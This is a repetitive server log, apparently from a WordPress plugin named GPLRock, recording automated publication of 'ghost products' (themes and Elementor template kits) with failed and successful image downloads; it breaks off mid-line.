kossy-minimalist-ecommerce-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/kossy---minimalist-ecommerce-wordpress-theme-11701.webp for product kossy-minimalist-ecommerce-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:02 UTC] GPLRock WARNING: Image download failed for product kossy-minimalist-ecommerce-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/kossy---minimalist-ecommerce-wordpress-theme-11701.webp [06-Apr-2026 11:52:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: kossy-minimalist-ecommerce-wordpress-theme [06-Apr-2026 11:52:02 UTC] GPLRock: Image download failed for product dexfolio-creative-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:04 UTC] GPLRock: Image download failed for product dexfolio-creative-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:06 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dexfolio---creative-portfolio--agency-wordpress-theme-20097.webp for product dexfolio-creative-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:06 UTC] GPLRock: Image download failed for product dexfolio-creative-portfolio-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:08 UTC] GPLRock: Image download failed for product dexfolio-creative-portfolio-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/dexfolio---creative-portfolio--agency-wordpress-theme-20097.webp for product dexfolio-creative-portfolio-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:11 UTC] GPLRock WARNING: Image download failed for product dexfolio-creative-portfolio-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/dexfolio---creative-portfolio--agency-wordpress-theme-20097.webp [06-Apr-2026 11:52:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: dexfolio-creative-portfolio-agency-wordpress-theme [06-Apr-2026 11:52:11 UTC] GPLRock: Image download failed for product volt-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:13 UTC] GPLRock: Image download failed for product volt-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/volt---newspaper--magazine-wordpress-theme-9334.webp for product volt-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:15 UTC] GPLRock: Image download failed for product volt-newspaper-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:17 UTC] GPLRock: Image download failed for product volt-newspaper-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:19 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/volt---newspaper--magazine-wordpress-theme-9334.webp for product volt-newspaper-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:19 UTC] GPLRock WARNING: Image download failed for product volt-newspaper-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/volt---newspaper--magazine-wordpress-theme-9334.webp [06-Apr-2026 11:52:19 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: volt-newspaper-magazine-wordpress-theme [06-Apr-2026 11:52:19 UTC] GPLRock: Image download failed for product ashtanga-yoga-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:21 UTC] GPLRock: Image download failed for product ashtanga-yoga-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:24 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ashtanga---yoga-studio-wordpress-theme-23279.webp for product ashtanga-yoga-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:24 UTC] GPLRock: Image download failed for product ashtanga-yoga-studio-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:26 UTC] GPLRock: Image download failed for product ashtanga-yoga-studio-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:28 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/ashtanga---yoga-studio-wordpress-theme-23279.webp for product ashtanga-yoga-studio-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:28 UTC] GPLRock WARNING: Image download failed for product ashtanga-yoga-studio-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/ashtanga---yoga-studio-wordpress-theme-23279.webp [06-Apr-2026 11:52:28 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: ashtanga-yoga-studio-wordpress-theme [06-Apr-2026 11:52:28 UTC] GPLRock: Image download failed for product appdev-mobile-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:30 UTC] GPLRock: Image download failed for product appdev-mobile-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:32 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appdev---mobile-app-showcase-wordpress-theme-16318.webp for product appdev-mobile-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:32 UTC] GPLRock: Image download failed for product appdev-mobile-app-showcase-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:34 UTC] GPLRock: Image download failed for product appdev-mobile-app-showcase-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:37 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/appdev---mobile-app-showcase-wordpress-theme-16318.webp for product appdev-mobile-app-showcase-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:37 UTC] GPLRock WARNING: Image download failed for product appdev-mobile-app-showcase-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/appdev---mobile-app-showcase-wordpress-theme-16318.webp [06-Apr-2026 11:52:37 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: appdev-mobile-app-showcase-wordpress-theme [06-Apr-2026 11:52:37 UTC] GPLRock: Image download failed for product romani-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:39 UTC] GPLRock: Image download failed for product romani-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:41 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/romani---restaurant-wordpress-theme-32955.webp for product romani-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:41 UTC] GPLRock: Image download failed for product romani-restaurant-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:43 UTC] GPLRock: Image download failed for product romani-restaurant-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:45 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/romani---restaurant-wordpress-theme-32955.webp for product romani-restaurant-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:45 UTC] GPLRock WARNING: Image download failed for product romani-restaurant-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/romani---restaurant-wordpress-theme-32955.webp [06-Apr-2026 11:52:45 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: romani-restaurant-wordpress-theme [06-Apr-2026 11:52:45 UTC] GPLRock: Image download failed for product zumar-creative-multipurpose-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:47 UTC] GPLRock: Image download failed for product zumar-creative-multipurpose-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:50 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zumar---creative--multipurpose-elementor-wordpress-theme-27930.webp for product zumar-creative-multipurpose-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:50 UTC] GPLRock: Image download failed for product zumar-creative-multipurpose-elementor-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:52 UTC] GPLRock: Image download failed for product zumar-creative-multipurpose-elementor-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:54 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/zumar---creative--multipurpose-elementor-wordpress-theme-27930.webp for product zumar-creative-multipurpose-elementor-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:54 UTC] GPLRock WARNING: Image download failed for product zumar-creative-multipurpose-elementor-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/zumar---creative--multipurpose-elementor-wordpress-theme-27930.webp [06-Apr-2026 11:52:54 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: zumar-creative-multipurpose-elementor-wordpress-theme [06-Apr-2026 11:52:54 UTC] GPLRock: Image download failed for product travic-tour-travels-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:56 UTC] GPLRock: Image download failed for product travic-tour-travels-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:52:58 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travic---tour--travels-agency-wordpress-theme-2686.webp for product travic-tour-travels-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:52:58 UTC] GPLRock: Image download failed for product travic-tour-travels-agency-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:00 UTC] GPLRock: Image download failed for product travic-tour-travels-agency-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:02 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/travic---tour--travels-agency-wordpress-theme-2686.webp for product travic-tour-travels-agency-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:53:02 UTC] GPLRock WARNING: Image download failed for product travic-tour-travels-agency-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/travic---tour--travels-agency-wordpress-theme-2686.webp [06-Apr-2026 11:53:02 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: travic-tour-travels-agency-wordpress-theme [06-Apr-2026 11:53:03 UTC] GPLRock: Image download failed for product neomag-news-and-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:05 UTC] GPLRock: Image download failed for product neomag-news-and-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:07 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neomag---news-and-magazine-wordpress-theme-29865.webp for product neomag-news-and-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:53:07 UTC] GPLRock: Image download failed for product neomag-news-and-magazine-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:09 UTC] GPLRock: Image download failed for product neomag-news-and-magazine-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:11 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/neomag---news-and-magazine-wordpress-theme-29865.webp for product neomag-news-and-magazine-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:53:11 UTC] GPLRock WARNING: Image download failed for product neomag-news-and-magazine-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/neomag---news-and-magazine-wordpress-theme-29865.webp [06-Apr-2026 11:53:11 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: neomag-news-and-magazine-wordpress-theme [06-Apr-2026 11:53:11 UTC] GPLRock: Image download failed for product calens-call-center-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:13 UTC] GPLRock: Image download failed for product calens-call-center-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:15 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calens---call-center-services-wordpress-theme-31419.webp for product calens-call-center-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:53:16 UTC] GPLRock: Image download failed for product calens-call-center-services-wordpress-theme (attempt 1/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:18 UTC] GPLRock: Image download failed for product calens-call-center-services-wordpress-theme (attempt 2/3). HTTP Code: 526, Error: . Retrying... [06-Apr-2026 11:53:20 UTC] GPLRock Error: Failed to download image from https://meldwp.com/wp-content/uploads/calens---call-center-services-wordpress-theme-31419.webp for product calens-call-center-services-wordpress-theme after 3 attempts. HTTP Code: 526, Error: [06-Apr-2026 11:53:20 UTC] GPLRock WARNING: Image download failed for product calens-call-center-services-wordpress-theme. URL: https://meldwp.com/wp-content/uploads/calens---call-center-services-wordpress-theme-31419.webp [06-Apr-2026 11:53:20 UTC] GPLRock WARNING: Ghost product published WITHOUT image - Product ID: calens-call-center-services-wordpress-theme [06-Apr-2026 11:53:48 UTC] GPLRock: Image downloaded successfully for product moxpay-online-payment-gateway-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7cc712f3.webp [06-Apr-2026 11:53:48 UTC] GPLRock: Using pre-downloaded image for product moxpay-online-payment-gateway-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-7cc712f3.webp [06-Apr-2026 11:53:48 UTC] GPLRock: Ghost product published with image - Product ID: moxpay-online-payment-gateway-elementor-template-kit [06-Apr-2026 11:53:50 UTC] GPLRock: Image downloaded successfully for product lawnia-gardener-landscaping-business-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cdfa320d.webp [06-Apr-2026 11:53:50 UTC] GPLRock: Using pre-downloaded image for product lawnia-gardener-landscaping-business-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cdfa320d.webp [06-Apr-2026 11:53:50 UTC] GPLRock: Ghost product published with image - Product ID: lawnia-gardener-landscaping-business-elementor-template-kit [06-Apr-2026 11:53:51 UTC] GPLRock: Image downloaded successfully for product lawex-lawyer-attorney-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aed85a4c.webp [06-Apr-2026 11:53:51 UTC] GPLRock: Using pre-downloaded image for product lawex-lawyer-attorney-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-aed85a4c.webp [06-Apr-2026 11:53:51 UTC] GPLRock: Ghost product published with image - Product ID: lawex-lawyer-attorney-elementor-template-kit [06-Apr-2026 11:53:53 UTC] GPLRock: Image downloaded successfully for product lajavela-bar-nightlife-pub-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e7629fa.jpg [06-Apr-2026 11:53:53 UTC] GPLRock: Using pre-downloaded image for product lajavela-bar-nightlife-pub-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-5e7629fa.jpg [06-Apr-2026 11:53:53 UTC] GPLRock: Ghost product published with image - Product ID: lajavela-bar-nightlife-pub-elementor-template-kit [06-Apr-2026 11:53:55 UTC] GPLRock: Image downloaded successfully for product evernet-broadband-internet-service-provider-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b13cf9e9.jpg [06-Apr-2026 11:53:55 UTC] GPLRock: Using pre-downloaded image for product evernet-broadband-internet-service-provider-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-b13cf9e9.jpg [06-Apr-2026 11:53:55 UTC] GPLRock: Ghost product published with image - Product ID: evernet-broadband-internet-service-provider-elementor-template-kit [06-Apr-2026 11:53:56 UTC] GPLRock: Image downloaded successfully for product edelweiss-yoga-meditation-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9e84b2a.webp [06-Apr-2026 11:53:56 UTC] GPLRock: Using pre-downloaded image for product edelweiss-yoga-meditation-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-a9e84b2a.webp [06-Apr-2026 11:53:56 UTC] GPLRock: Ghost product published with image - Product ID: edelweiss-yoga-meditation-elementor-template-kit [06-Apr-2026 11:53:57 UTC] GPLRock: Image downloaded successfully for product dyelex-painting-wallpapering-service-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1cf7c69d.jpg [06-Apr-2026 11:53:57 UTC] GPLRock: Using pre-downloaded image for product dyelex-painting-wallpapering-service-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-1cf7c69d.jpg [06-Apr-2026 11:53:57 UTC] GPLRock: Ghost product published with image - Product ID: dyelex-painting-wallpapering-service-elementor-template-kit [06-Apr-2026 11:53:59 UTC] GPLRock: Image downloaded successfully for product droid-robotics-technology-services-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2925ebe1.webp [06-Apr-2026 11:53:59 UTC] GPLRock: Using pre-downloaded image for product droid-robotics-technology-services-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-2925ebe1.webp [06-Apr-2026 11:53:59 UTC] GPLRock: Ghost product published with image - Product ID: droid-robotics-technology-services-elementor-template-kit [06-Apr-2026 11:54:00 UTC] GPLRock: Image downloaded successfully for product doughclass-baking-pastry-class-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b1d60b6.jpg [06-Apr-2026 11:54:00 UTC] GPLRock: Using pre-downloaded image for product doughclass-baking-pastry-class-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-5b1d60b6.jpg [06-Apr-2026 11:54:00 UTC] GPLRock: Ghost product published with image - Product ID: doughclass-baking-pastry-class-elementor-template-kit [06-Apr-2026 11:54:02 UTC] GPLRock: Image downloaded successfully for product dosino-arcade-games-attractions-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b067359a.jpg [06-Apr-2026 11:54:02 UTC] GPLRock: Using pre-downloaded image for product dosino-arcade-games-attractions-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b067359a.jpg [06-Apr-2026 11:54:02 UTC] GPLRock: Ghost product published with image - Product ID: dosino-arcade-games-attractions-elementor-template-kit [06-Apr-2026 11:58:45 UTC] GPLRock: Image downloaded successfully for product nikicivi-elegant-cv-resume-portfolio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f520e3c.webp [06-Apr-2026 11:58:45 UTC] GPLRock: Using pre-downloaded image for product nikicivi-elegant-cv-resume-portfolio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-8f520e3c.webp [06-Apr-2026 11:58:45 UTC] GPLRock: Ghost product published with image - Product ID: nikicivi-elegant-cv-resume-portfolio-elementor-template-kit [06-Apr-2026 11:58:47 UTC] GPLRock: Image downloaded successfully for product ngepet-creative-agency-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f94fc0a.webp [06-Apr-2026 11:58:47 UTC] GPLRock: Using pre-downloaded image for product ngepet-creative-agency-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-1f94fc0a.webp [06-Apr-2026 11:58:47 UTC] GPLRock: Ghost product published with image - Product ID: ngepet-creative-agency-company-elementor-template-kit [06-Apr-2026 11:58:48 UTC] GPLRock: Image downloaded successfully for product ngecor-construction-building-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4c3e2450.webp [06-Apr-2026 11:58:48 UTC] GPLRock: Using pre-downloaded image for product ngecor-construction-building-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4c3e2450.webp [06-Apr-2026 11:58:48 UTC] GPLRock: Ghost product published with image - Product ID: ngecor-construction-building-company-elementor-template-kit [06-Apr-2026 11:58:50 UTC] GPLRock: Image downloaded successfully for product nelson-barbershop-hairdresser-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb81b70a.webp [06-Apr-2026 11:58:50 UTC] GPLRock: Using pre-downloaded image for product nelson-barbershop-hairdresser-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-cb81b70a.webp [06-Apr-2026 11:58:50 UTC] GPLRock: Ghost product published with image - Product ID: nelson-barbershop-hairdresser-elementor-template-kit [06-Apr-2026 11:58:51 UTC] GPLRock: Image downloaded successfully for product nelly-blog-magazine-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-300533ed.webp [06-Apr-2026 11:58:51 UTC] GPLRock: Using pre-downloaded image for product nelly-blog-magazine-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-300533ed.webp [06-Apr-2026 11:58:51 UTC] GPLRock: Ghost product published with image - Product ID: nelly-blog-magazine-elementor-template-kit [06-Apr-2026 11:58:53 UTC] GPLRock: Image downloaded successfully for product needle-tattoo-studio-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ddee81cc.webp [06-Apr-2026 11:58:53 UTC] GPLRock: Using pre-downloaded image for product needle-tattoo-studio-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-ddee81cc.webp [06-Apr-2026 11:58:53 UTC] GPLRock: Ghost product published with image - Product ID: needle-tattoo-studio-elementor-template-kit [06-Apr-2026 11:58:54 UTC] GPLRock: Image downloaded successfully for product naturely-natural-cosmetics-beauty-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c23db02d.webp [06-Apr-2026 11:58:54 UTC] GPLRock: Using pre-downloaded image for product naturely-natural-cosmetics-beauty-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-c23db02d.webp [06-Apr-2026 11:58:54 UTC] GPLRock: Ghost product published with image - Product ID: naturely-natural-cosmetics-beauty-template-kit [06-Apr-2026 11:58:55 UTC] GPLRock: Image downloaded successfully for product namex-cyber-security-services-company-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25e40246.webp [06-Apr-2026 11:58:56 UTC] GPLRock: Using pre-downloaded image for product namex-cyber-security-services-company-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-25e40246.webp [06-Apr-2026 11:58:56 UTC] GPLRock: Ghost product published with image - Product ID: namex-cyber-security-services-company-elementor-template-kit [06-Apr-2026 11:58:57 UTC] GPLRock: Image downloaded successfully for product nala-beauty-spa-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e04e530b.webp [06-Apr-2026 11:58:57 UTC] GPLRock: Using pre-downloaded image for product nala-beauty-spa-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-e04e530b.webp [06-Apr-2026 11:58:57 UTC] GPLRock: Ghost product published with image - Product ID: nala-beauty-spa-template-kit [06-Apr-2026 11:58:58 UTC] GPLRock: Image downloaded successfully for product nada-guitar-lessons-courses-elementor-template-kit (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72bbcb42.webp [06-Apr-2026 11:58:59 UTC] GPLRock: Using pre-downloaded image for product nada-guitar-lessons-courses-elementor-template-kit: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-72bbcb42.webp [06-Apr-2026 11:58:59 UTC] GPLRock: Ghost product published with image - Product ID: nada-guitar-lessons-courses-elementor-template-kit [06-Apr-2026 12:11:01 UTC] GPLRock: Image downloaded successfully for product css-igniter-nozama-woocommerce-theme (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23bea70a.jpg [06-Apr-2026 12:11:01 UTC] GPLRock: Using pre-downloaded image for product css-igniter-nozama-woocommerce-theme: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-23bea70a.jpg [06-Apr-2026 12:11:01 UTC] GPLRock: Ghost product published with image - Product ID: css-igniter-nozama-woocommerce-theme [06-Apr-2026 12:11:02 UTC] GPLRock: Image downloaded successfully for product ninja-beaver-pro (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9202b99f.jpg [06-Apr-2026 12:11:02 UTC] GPLRock: Using pre-downloaded image for product ninja-beaver-pro: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-9202b99f.jpg [06-Apr-2026 12:11:02 UTC] GPLRock: Ghost product published with image - Product ID: ninja-beaver-pro [06-Apr-2026 12:11:03 UTC] GPLRock: Image downloaded successfully for product geodirectory-custom-google-maps (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f3f9516.jpg [06-Apr-2026 12:11:03 UTC] GPLRock: Using pre-downloaded image for product geodirectory-custom-google-maps: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-4f3f9516.jpg [06-Apr-2026 12:11:03 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-custom-google-maps [06-Apr-2026 12:11:04 UTC] GPLRock: Image downloaded successfully for product geodirectory-buddypress-integration (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e99a7743.jpg [06-Apr-2026 12:11:04 UTC] GPLRock: Using pre-downloaded image for product geodirectory-buddypress-integration: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-e99a7743.jpg [06-Apr-2026 12:11:04 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-buddypress-integration [06-Apr-2026 12:11:05 UTC] GPLRock: Image downloaded successfully for product geodirectory-ajax-duplicate-alert (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2073d173.jpg [06-Apr-2026 12:11:05 UTC] GPLRock: Using pre-downloaded image for product geodirectory-ajax-duplicate-alert: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/04/img-2073d173.jpg [06-Apr-2026 12:11:05 UTC] GPLRock: Ghost product published with image - Product ID: geodirectory-ajax-duplicate-alert [06-Apr-2026 12:11:07 UTC] GPLRock: Image downloaded successfully for product easy-digital-downloads-currency-converter (attempt 1) to: /home/masterro/colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4de15ac.jpg [06-Apr-2026 12:11:07 UTC] GPLRock: Using pre-downloaded image for product easy-digital-downloads-currency-converter: https://colapatriamultibanca.com.subimicrotech.com/wp/wp-content/uploads/2026/03/img-b4de15ac.jpg [06-Apr-2026 12:11:07 UTC] GPLRock: Ghost product published with image - Product ID: easy-digital-downloads-currency-converter [06-Apr-2026 12:11:10 UTC] GPLRock: Image download failed for product divi-bodycommerce (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:11:14 UTC] GPLRock: Image download failed for product divi-bodycommerce (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:11:18 UTC] GPLRock Error: Failed to download image from https://www.gplrock.com/wp-content/uploads/2020/07/Divi-BodyCommerce.jpg for product divi-bodycommerce after 3 attempts. HTTP Code: 404, Error: [06-Apr-2026 12:11:20 UTC] GPLRock: Image download failed for product divi-bodycommerce (attempt 1/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 12:11:24 UTC] GPLRock: Image download failed for product divi-bodycommerce (attempt 2/3). HTTP Code: 404, Error: . Retrying... [06-Apr-2026 